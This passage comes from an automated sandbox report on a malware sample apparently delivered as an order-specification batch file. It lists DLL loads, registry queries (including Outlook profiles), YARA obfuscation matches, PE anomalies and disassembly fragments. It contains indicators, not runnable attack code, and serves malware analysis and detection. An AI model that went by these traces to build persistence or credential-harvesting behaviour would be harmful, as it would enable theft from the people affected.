                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: edputil.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: apphelp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: version.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: uxtheme.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: url.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ieframe.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: iertutil.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: netapi32.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: userenv.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: winhttp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: wkscli.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: netutils.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: amsi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: spp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: vssapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: vsstrace.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: dbghelp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: winmm.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: wininet.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: sspicli.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: windows.storage.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: wldp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: profapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: kernel.appcore.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ieproxy.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ieproxy.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ieproxy.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: mssip32.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: mssip32.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: mssip32.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: smartscreenps.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: smartscreenps.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: smartscreenps.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: mswsock.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: iphlpapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: winnsi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ???.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ???.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ???.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ??l.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ??l.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ??l.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ????.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ???e???????????.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ???e???????????.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ??l.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: ??l.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: tquery.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: cryptdll.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: mssip32.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: endpointdlp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: endpointdlp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: endpointdlp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: endpointdlp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: sppwmi.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: slc.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: sppcext.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: winscard.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: devobj.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: cryptsp.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: rsaenh.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: cryptbase.dll
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                      Source: TrojanAIbot.exe.lnk.14.drLNK file: ..\..\..\..\..\ACCApi\TrojanAIbot.exe
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.batStatic file information: File size 1393123 > 1048576
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: x.exe, x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020D47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1329954497.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1472715771.00000000022E6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020CA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330431133.000000007F920000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000008.00000003.1441667884.0000000000AC0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000009.00000003.1445817918.0000000005170000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbH source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000002.1474717040.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1446636535.000000002212F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1446636535.00000000220FE000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020D47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330164805.00000000028C9000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1329954497.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1472715771.00000000022E6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020CA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330431133.000000007F920000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdb source: esentutl.exe, 00000008.00000003.1441667884.0000000000AC0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ping.pdb source: esentutl.exe, 00000009.00000003.1445817918.0000000005170000.00000004.00001000.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: Yara matchFile source: 4.2.x.exe.2e40000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000003.1329954497.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1330431133.000000007F920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: lxsyrsiW.pif.4.drStatic PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E5894C LoadLibraryW,GetProcAddress,FreeLibrary,4_2_02E5894C
                      Source: armsvc.exe.12.drStatic PE information: real checksum: 0x32318 should be: 0x140311
                      Source: neworigin.exe.12.drStatic PE information: real checksum: 0x0 should be: 0x480db
                      Source: x.exe.3.drStatic PE information: real checksum: 0x0 should be: 0x15c6e6
                      Source: server_BTC.exe.12.drStatic PE information: real checksum: 0x0 should be: 0x42478
                      Source: lxsyrsiW.pif.4.drStatic PE information: real checksum: 0x0 should be: 0x1768a
                      Source: Wisrysxl.PIF.10.drStatic PE information: real checksum: 0x0 should be: 0x15c6e6
                      Source: TrojanAIbot.exe.14.drStatic PE information: real checksum: 0x0 should be: 0x42478
                      Source: alpha.pif.8.drStatic PE information: section name: .didat
                      Source: armsvc.exe.12.drStatic PE information: section name: .didat
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E6D2FC push 02E6D367h; ret 4_2_02E6D35F
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E463AE push 02E4640Bh; ret 4_2_02E46403
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E463B0 push 02E4640Bh; ret 4_2_02E46403
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E6C378 push 02E6C56Eh; ret 4_2_02E6C566
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E4C349 push 8B02E4C1h; ret 4_2_02E4C34E
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E4332C push eax; ret 4_2_02E43368
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E6D0AC push 02E6D125h; ret 4_2_02E6D11D
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E5306C push 02E530B9h; ret 4_2_02E530B1
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E5306B push 02E530B9h; ret 4_2_02E530B1
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E6D1F8 push 02E6D288h; ret 4_2_02E6D280
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E6D144 push 02E6D1ECh; ret 4_2_02E6D1E4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E5F108 push ecx; mov dword ptr [esp], edx4_2_02E5F10D
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E46784 push 02E467C6h; ret 4_2_02E467BE
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E46782 push 02E467C6h; ret 4_2_02E467BE
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E4D5A0 push 02E4D5CCh; ret 4_2_02E4D5C4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E4C56C push ecx; mov dword ptr [esp], edx4_2_02E4C571
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E6C570 push 02E6C56Eh; ret 4_2_02E6C566
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E5AAE0 push 02E5AB18h; ret 4_2_02E5AB10
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E58AD8 push 02E58B10h; ret 4_2_02E58B08
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E4CA4E push 02E4CD72h; ret 4_2_02E4CD6A
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E4CBEC push 02E4CD72h; ret 4_2_02E4CD6A
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E5886C push 02E588AEh; ret 4_2_02E588A6
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02EB4850 push eax; ret 4_2_02EB4920
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E56946 push 02E569F3h; ret 4_2_02E569EB
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E56948 push 02E569F3h; ret 4_2_02E569EB
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E5790C push 02E57989h; ret 4_2_02E57981
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E55E7C push ecx; mov dword ptr [esp], edx4_2_02E55E7E
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E52F60 push 02E52FD6h; ret 4_2_02E52FCE
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_01210C6D push edi; retf 13_2_01210C7A
